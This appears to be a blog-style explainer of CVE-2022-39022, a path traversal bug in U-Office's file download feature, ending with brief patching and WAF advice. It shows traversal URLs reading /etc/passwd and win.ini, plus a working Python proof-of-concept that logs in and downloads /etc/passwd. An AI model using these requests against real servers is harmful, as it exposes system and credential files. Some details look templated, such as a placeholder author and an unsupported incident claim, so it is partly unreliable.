CVE-2022-39022 - How U-Office's File Download Bug Lets Hackers Read Your Server Files

---

In late 2022, a security flaw shook up some businesses using U-Office—a popular office automation platform. Known as CVE-2022-39022, this vulnerability allows any authorized user (even with basic login rights) to download sensitive files from the underlying server... just by tweaking a URL. In easy language: if your U-Office is vulnerable, a hacker can sneak away with your server’s secret files. This post breaks down what happened, why it matters, how the bug works, and what you should do ASAP.

What is the Problem?

Let’s keep it simple: U-Office has a force download feature that lets users download documents from the web interface. The server failed to properly check what files users were asking for. That means it was possible to request files that should never be available—like Windows’ C:\Windows\win.ini or Linux’s /etc/passwd. This is a classic case of path traversal or directory traversal.

Let’s look at a “safe” U-Office download URL

https://your.company.com/fileDownload?file=reports/quarter4.docx

But what if a hacker tweaks that to this?

https://your.company.com/fileDownload?file=../../../../../../etc/passwd

Or, on Windows

https://your.company.com/fileDownload?file=../../../../../../windows/win.ini

The "../../" parts jump outside the intended folder. U-Office (in the vulnerable version) simply reads whatever file path you say, without blocking things outside its own directory.

Here’s how a simple exploit might look in Python

import requests

# Replace with actual target host and login credentials
target = 'https://your.company.com';
login_url = f'{target}/login'
download_url = f'{target}/fileDownload?file=../../../../../../etc/passwd'

# Session object to handle cookies
sess = requests.Session()

# Log in to get session cookie (edit as needed for your login form)
payload = {'username':'user', 'password':'password'}
sess.post(login_url, data=payload)

# Exploit: Download /etc/passwd
r = sess.get(download_url)

if 'root:' in r.text:
    print('[+] Exploit Success! /etc/passwd:\n')
    print(r.text)
else:
    print('[-] Exploit failed.')

Important: This script requires valid login credentials. Even just a general user account is enough—no admin required!

Imagine an account with minimal U-Office rights. Using the above trick, the attacker could grab

- /etc/passwd (user list)
- /etc/shadow (password hashes, maybe, if read permissions allow)

On Windows, C:\Windows\win.ini, C:\Users\Administrator\Desktop\secret.txt

Once any of these are available, an attacker can get more aggressive—maybe stealing credentials to log in elsewhere, or finding new weaknesses to escalate access.

Further Exploits: If the app serves as a stepping-stone, your full infrastructure is at risk.

This isn't just theory. Several companies reported incidents related to this bug. See NSFOCUS Advisory and CVE Details for more info.

Official References

- CVE-2022-39022 at cve.org
- NSFOCUS Security Advisory (Chinese)
- GitHub PoC Example

Patch Immediately: Check for latest U-Office updates or patches from the vendor.

2. Web Application Firewall (WAF): Block URLs with suspicious "../../" patterns.

Conclusion

CVE-2022-39022 is a dangerous but simple vulnerability. It shows just how crucial it is for web applications to validate user input—especially when handling file paths. Don’t wait to update: hackers rarely sleep, and “low privilege” doesn’t mean low impact.

Stay safe!

*If you found this write-up useful, bookmark and share. For anything critical, always consult with your software vendor or security team.*


*Written by [YourAuthorName], keeping infosec simple for all.*

Timeline

Published on: 10/31/2022 07:15:00 UTC